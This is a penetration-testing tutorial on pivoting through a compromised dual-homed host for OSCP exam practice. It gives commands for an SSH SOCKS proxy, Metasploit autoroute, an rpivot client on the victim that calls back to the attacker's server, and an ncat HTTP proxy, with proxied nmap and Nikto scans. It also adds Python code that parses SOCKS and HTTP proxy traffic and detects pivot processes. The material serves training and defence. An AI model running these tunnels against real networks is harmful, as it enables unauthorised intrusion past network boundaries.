Advanced Pivoting Tactics I learned during the Penetration Testing with Kali Linux Course (supplementary material)

How to create a REVERSED Dynamic SOCKS proxy that runs on the victim (alternative to Metasploit routing)

What is a dynamic SOCKS proxy? Normally, when you have compromised a system that runs SSH and is multi-homed (two or more NICs, say 10.1.1.230 and 10.11.1.230), you would run

ssh -NfD 1080 root@victim

And then, to run an nmap scan through that victim (the scans appear to come from the compromised host), point proxychains at the SOCKS listener. Keep in mind that only TCP connect traffic traverses a SOCKS proxy, so -sT is the scan type that actually goes through it; -O and -sU need raw packets and are not proxied.

echo 'socks4 127.0.0.1 1080' >> /etc/proxychains.conf

and comment out the default line ‘socks4 127.0.0.1 9050’ by prefixing it with #.

proxychains nmap -sT -Pn -O -sV -sU 10.1.1.0/24
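To see what a dynamic SOCKS proxy actually carries, the following added example (not code from the original post or from any tool it mentions) decodes the SOCKS4 request that a client such as proxychains sends to the ssh -D listener, and builds the reply the proxy returns. The sample requests are constructed; the hostname intranet.local and the user id nmap are placeholders. The same decoder doubles as a fingerprint for spotting SOCKS4/SOCKS4a handshakes in captured traffic, which is how a defender recognises a tunnel on an unexpected port.

```python
import struct
import ipaddress

# Constructed sample: a SOCKS4 CONNECT asking the proxy to open 10.1.1.236:80.
# Layout: VN=4, CD=1 (CONNECT), DSTPORT, DSTIP, USERID, NUL.
SOCKS4_CONNECT = (b"\x04\x01" + struct.pack("!H", 80)
                  + bytes([10, 1, 1, 236]) + b"nmap\x00")

# Constructed sample of the SOCKS4a variant used by proxychains for DNS-through-proxy:
# DSTIP is 0.0.0.x and the real hostname follows USERID as a second NUL-terminated string.
SOCKS4A_CONNECT = (b"\x04\x01" + struct.pack("!H", 443)
                   + b"\x00\x00\x00\x01" + b"\x00" + b"intranet.local\x00")


def parse_socks4_request(data: bytes) -> dict:
    """Decode a SOCKS4 / SOCKS4a CONNECT or BIND request.

    Returns cmd, host, port, user and whether the 4a hostname form was used.
    Raises ValueError for anything that is not a well-formed request.
    """
    if len(data) < 9:
        raise ValueError("too short for a SOCKS4 request")
    version, cmd, port = struct.unpack("!BBH", data[:4])
    if version != 4:
        raise ValueError(f"not SOCKS4 (version byte {version})")
    if cmd not in (1, 2):
        raise ValueError(f"unknown SOCKS4 command {cmd}")
    ip = ipaddress.IPv4Address(data[4:8])
    rest = data[8:]
    nul = rest.find(b"\x00")
    if nul < 0:
        raise ValueError("USERID not NUL-terminated")
    user = rest[:nul].decode("ascii", "replace")
    rest = rest[nul + 1:]
    # 0.0.0.x with x != 0 signals SOCKS4a: the destination is a hostname, not the IP.
    socks4a = 0 < int(ip) < 256
    host = str(ip)
    if socks4a:
        nul = rest.find(b"\x00")
        if nul < 0:
            raise ValueError("SOCKS4a hostname not NUL-terminated")
        host = rest[:nul].decode("ascii", "replace")
    return {"cmd": "CONNECT" if cmd == 1 else "BIND", "host": host,
            "port": port, "user": user, "socks4a": socks4a}


def socks4_reply(granted: bool) -> bytes:
    """The 8-byte reply the proxy sends back: VN=0, CD=90 granted / 91 rejected."""
    return struct.pack("!BBH4s", 0, 90 if granted else 91, 0, b"\x00\x00\x00\x00")


def looks_like_socks4(data: bytes) -> bool:
    """True when the first bytes of a stream parse as a SOCKS4 request."""
    try:
        parse_socks4_request(data)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for sample in (SOCKS4_CONNECT, SOCKS4A_CONNECT):
        print(parse_socks4_request(sample))
    print(socks4_reply(True).hex())
```

Every connection proxychains makes on the attacker's side begins with one of these requests; the SSH client turns each into a direct-tcpip channel and the remote sshd opens the real connection from the victim's own address, which is why the scans appear to originate there.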

For machines without an SSH server (Windows before 10 ships no OpenSSH), the usual route is Metasploit, which is restricted in the exam

You would pop a Meterpreter shell and run

sessions -C 'run autoroute'
use auxiliary/server/socks4a
run -j

And repeat the same proxychains command

However, there is a problem.

1. Metasploit REQUIRES a Meterpreter shell to use its internal routing system

2. Metasploit/Meterpreter usage is restricted to ONE machine on the OSCP exam

3. Therefore, you should restrict your usage of Metasploit/Meterpreter until you really need it, and rely mainly on netcat, ncat, and socat to catch shells.

The alternative…

You can create a reversed dynamic SOCKS proxy using this publicly available tool called rpivot. Simply git clone the repo

git clone --recursive https://github.com/klsecservices/rpivot

And download and unzip the released file with the Windows executable binary

wget https://github.com/klsecservices/rpivot/releases/download/v1.0/client.exe -O rpivot.exe

Now drop rpivot.exe onto the victim and run the client. Assume that I, the attacker, am at 10.11.0.30 and the compromised dual-homed machine is 10.11.1.230/10.1.1.230

Start your listener on the attacker machine. --server-ip/--server-port is where the victim's client will connect back to; --proxy-ip/--proxy-port is where server.py binds the SOCKS listener on your own box, so it is your loopback address, matching the socks4 127.0.0.1 1080 line in proxychains.conf.

python server.py --server-port 9999 --server-ip 0.0.0.0 --proxy-ip 127.0.0.1 --proxy-port 1080

On the victim, open cmd.exe, change into the directory holding rpivot.exe, and run

rpivot.exe --server-ip 10.11.0.30 --server-port 9999

Now repeat the proxychains configuration step (socks4 127.0.0.1 1080, as above) and run the proxychained scan

proxychains nmap -sT -Pn -O -sV -sU 10.1.1.0/24

How to drop an HTTP Proxy on the victim with ncat

Alternatively, you can drop ncat.exe onto the victim to create a more capable HTTP proxy listener, which gives you several advantages:

1. You can run HTTP-proxy-aware tools such as Firefox, Burp Suite, and Nikto through the proxy

2. Because an HTTP proxy operates at Layer 7 (Application) of the OSI model, you can see more of the data and perform pivoted HTTP, URL injection, SQL injection, and XSS testing through the proxy
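The Layer 7 point above has a concrete consequence worth seeing: a proxy-aware client sends plain HTTP to a proxy as an absolute-URI request that the proxy can read in full, but sends TLS (or any non-HTTP TCP) as a CONNECT tunnel, of which the proxy only learns host and port. The added example below (not code from the original post or from ncat) parses both forms as an HTTP proxy, or a defender's proxy log, would see them; the two requests are constructed samples.

```python
from urllib.parse import urlsplit

# Constructed sample: a forward-proxy request for plain HTTP. The proxy sees
# method, full URL and headers, so it can log or inspect every detail.
ABSOLUTE_URI_REQUEST = (
    b"GET http://10.1.1.236/cgi-bin/test.cgi?id=1 HTTP/1.1\r\n"
    b"Host: 10.1.1.236\r\n"
    b"User-Agent: Mozilla/5.0\r\n\r\n"
)

# Constructed sample: a CONNECT tunnel as used for HTTPS. The proxy only
# learns the destination host and port; the payload stays opaque.
CONNECT_REQUEST = (
    b"CONNECT 10.1.1.236:443 HTTP/1.1\r\n"
    b"Host: 10.1.1.236:443\r\n\r\n"
)


def parse_proxy_request(raw: bytes) -> dict:
    """Classify an HTTP proxy request as 'forward' (absolute URI) or 'tunnel' (CONNECT).

    Returns method, destination host/port, the path where visible, and whether
    the proxy can see the application payload. Raises ValueError on malformed input.
    """
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    try:
        method, target, version = lines[0].split(" ")
    except ValueError:
        raise ValueError("malformed request line")
    if not version.startswith("HTTP/"):
        raise ValueError("missing HTTP version")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()

    if method == "CONNECT":
        host, _, port = target.rpartition(":")
        if not host or not port.isdigit():
            raise ValueError("CONNECT target must be host:port")
        return {"mode": "tunnel", "method": method, "host": host,
                "port": int(port), "path": None, "payload_visible": False}

    parts = urlsplit(target)
    if parts.scheme != "http" or not parts.hostname:
        raise ValueError("forward-proxy request needs an absolute http:// URI")
    path = parts.path or "/"
    if parts.query:
        path += "?" + parts.query
    return {"mode": "forward", "method": method, "host": parts.hostname,
            "port": parts.port or 80, "path": path, "payload_visible": True}


def proxy_log_line(req: dict) -> str:
    """Render what a proxy's access log would record for the request."""
    if req["mode"] == "tunnel":
        return f"CONNECT {req['host']}:{req['port']} (opaque tunnel)"
    return f"{req['method']} http://{req['host']}:{req['port']}{req['path']}"


if __name__ == "__main__":
    for sample in (ABSOLUTE_URI_REQUEST, CONNECT_REQUEST):
        print(proxy_log_line(parse_proxy_request(sample)))
```

A SOCKS proxy never sees the request line at all, which is the difference the second advantage above is describing: with an HTTP proxy in the path, both the tester's tools and any logging on that hop can work with URLs and parameters rather than raw bytes.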

Download ncat.exe and drop it on the victim

wget http://nmap.org/dist/ncat-portable-5.59BETA1.zip -O ncat.zip && unzip ncat.zip -d ncat && cd ncat

Now, on the victim's Windows command line, start the listener. Bind it to the interface you can reach from the attacker box (10.11.1.230); bound to 127.0.0.1 it would only accept connections from the victim itself.

ncat.exe --listen --proxy-type http 10.11.1.230 8080

Remember that the proxy listener and its bound port are ON THE VICTIM (10.11.1.230). Therefore you must comment out the previous socks4 127.0.0.1 1080 line in /etc/proxychains.conf and replace it with

http 10.11.1.230 8080

You can still use proxychains as before. For proxy-aware apps, here is a Nikto example that scans a host on the newly reachable subnet through this proxy

nikto -host 10.1.1.236 -port 80 -proxy http://10.11.1.230:8080
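Both of the on-victim techniques above (rpivot.exe calling back to the attacker's server.py, and ncat.exe listening as an HTTP proxy) leave a host-level footprint that a defender can find. The added example below (not code from the original post or from either tool) parses a constructed `netstat -ano` listing and PID-to-image map from the dual-homed host and applies two checks: a TCP listener owned by a process outside an allow-list, and a single process holding established connections on two different local interfaces, which is what a pivot looks like from the inside. The allow-list of expected listener images is an illustrative assumption, not a complete baseline.

```python
from collections import defaultdict

# Constructed sample of `netstat -ano` on the dual-homed Windows host 10.11.1.230 / 10.1.1.230.
NETSTAT_SAMPLE = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       812
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    10.11.1.230:8080       0.0.0.0:0              LISTENING       3544
  TCP    10.11.1.230:49812      10.11.0.30:9999        ESTABLISHED     2912
  TCP    10.1.1.230:49820       10.1.1.236:80          ESTABLISHED     2912
  UDP    0.0.0.0:123            *:*                                    1040
"""

# Constructed PID -> image map as `tasklist` would give it.
PID_IMAGE = {812: "svchost.exe", 4: "System", 3544: "ncat.exe",
             2912: "rpivot.exe", 1040: "svchost.exe"}

# Assumed allow-list of images that are normally expected to own TCP listeners.
EXPECTED_LISTENERS = {"System", "svchost.exe", "lsass.exe", "wininit.exe", "services.exe"}


def parse_netstat(text: str) -> list:
    """Turn Windows `netstat -ano` output into a list of socket records."""
    rows = []
    for line in text.splitlines():
        f = line.split()
        if not f or f[0] not in ("TCP", "UDP"):
            continue  # header or blank line
        if f[0] == "TCP" and len(f) == 5:
            proto, local, foreign, state, pid = f
        elif f[0] == "UDP" and len(f) == 4:  # UDP rows carry no State column
            proto, local, foreign, pid = f
            state = ""
        else:
            continue
        lip, lport = local.rsplit(":", 1)
        fip, fport = foreign.rsplit(":", 1)
        rows.append({"proto": proto, "lip": lip, "lport": int(lport),
                     "fip": fip, "fport": fport, "state": state, "pid": int(pid)})
    return rows


def find_pivot_indicators(rows: list, pid_image: dict,
                          expected_listeners=EXPECTED_LISTENERS) -> list:
    """Return (rule, pid, image, detail) tuples for sockets that match a pivot pattern."""
    findings = []
    ifaces_per_pid = defaultdict(set)
    for r in rows:
        image = pid_image.get(r["pid"], "?")
        # Rule 1: a TCP listener owned by something outside the allow-list.
        if r["proto"] == "TCP" and r["state"] == "LISTENING" and image not in expected_listeners:
            findings.append(("unexpected_listener", r["pid"], image, f"{r['lip']}:{r['lport']}"))
        if r["state"] == "ESTABLISHED":
            ifaces_per_pid[r["pid"]].add(r["lip"])
    # Rule 2: one process with established connections on two local interfaces,
    # i.e. traffic entering on one network and leaving on another.
    for pid, ifaces in ifaces_per_pid.items():
        if len(ifaces) > 1:
            findings.append(("bridges_interfaces", pid, pid_image.get(pid, "?"),
                             ",".join(sorted(ifaces))))
    return findings


if __name__ == "__main__":
    for finding in find_pivot_indicators(parse_netstat(NETSTAT_SAMPLE), PID_IMAGE):
        print(finding)
```

Neither rule depends on the tool name, so renaming rpivot.exe or ncat.exe does not help; the second rule in particular fires on the behaviour the whole post is about, a process on a multi-homed host relaying between its two networks.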

I hope you enjoyed this portion of OSCP-Enhancement Skills!
